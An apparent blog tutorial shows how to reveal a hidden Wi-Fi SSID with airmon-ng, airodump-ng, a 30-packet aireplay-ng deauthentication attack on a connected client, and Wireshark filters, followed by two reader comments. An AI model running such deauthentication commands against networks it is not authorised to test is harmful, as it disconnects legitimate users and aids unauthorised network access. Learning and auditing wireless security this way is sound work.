Uncovering Hidden SSIDs using Wireshark

Hidden SSID is an option for every access-point in order to not broadcast the SSID. In case that an access-point is not broadcasting the SSID, only clients that already know the preconfigured SSID can establish a connection. At the time that legitimate clients are trying to connect to the access point Probe Request and Probe response packets are generated. These packets are containing the SSID of the wireless network. Using aireplay-ng and Wireshark the SSID can be revealed. Aireplay-ng is used to send Deauthentication packets to the stations that are connected in order to force them to disconnect and reconnect. Finally using Wireshark we will reveal the SSID of the wireless network.

  • airmon-ng start wlan0

This command creates mon0 interface. You can check if mon0 is created using the ifconfig command.

  • airodump-ng mon0


Where airodump-ng is the tool and mon0 is the monitor interface. At this time we want to reveal the SSID of the access point with BSSID 00:05:59:49:A7:A0. The <length: 0> means that the SSID is hidden.

  • airodump-ng -c 1 –bssid 00:05:59:49:A7:A0 mon0


Where airodump-ng is the tool, mon0 the interface, -c the channel and –bssid the MAC address of the access point. The figure above shows that there is one client connected with MAC address 64:A7:69:AD:5F:D2.

The next step is to deauthenticate the client. The following command is used.

  • aireplay-ng -0 30 -a  00:05:59:49:A7:A0 -c 64:A7:69:AD:5F:D2 mon0


Where aireplay-ng is the tool, -0 the parameter for the Deauthentication attack, 30 is the number of deauths, -a the MAC address of the wireless router, –c the MAC address of the client and mon0 the interface.

At this point Wireshark is used in order to view the deauthentication packets. We can isolate the results by adding the following filter.

  • wlan.fc.type_subtype == 0x0c


Finally as soon as the client connects back to the access point the SSID will be revealed. Analyzing the Probe Responses from the access point we can see the SSID as shown in the next picture. The following filter can be used in order to monitor all the beacon frames.

  • (wlan.bssid == 00:05:59:49:A7:A0) && !(wlan.fc.type_subtype == 0x08)



2 thoughts on “Uncovering Hidden SSIDs using Wireshark

  1. Pingback: Infosec Events » Blog Archive Week 9 In Review – 2014 » Infosec Events

  2. Good Information. But I have one question. What if I have a very large amount of csv file which was generated by Airodump-ng while i was running mon0 on the wifi network. I have done Access Point mapping and collected so many SSID, Hidden Network etc.. Till now I have only found this web based service which will provide us to visualize all the wireless network by category and we can also filter all the mac address, channel, Privacy etc.. Have a look. And Please let me know if you know any other services like this:

    Here I have shared my sample:- http://wifiscanvisualizer.appspot.com/visualize/e51265eec0fa11e49718a5406faae4de.

    In my sample file you can see I have lots of hidden wireless network.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s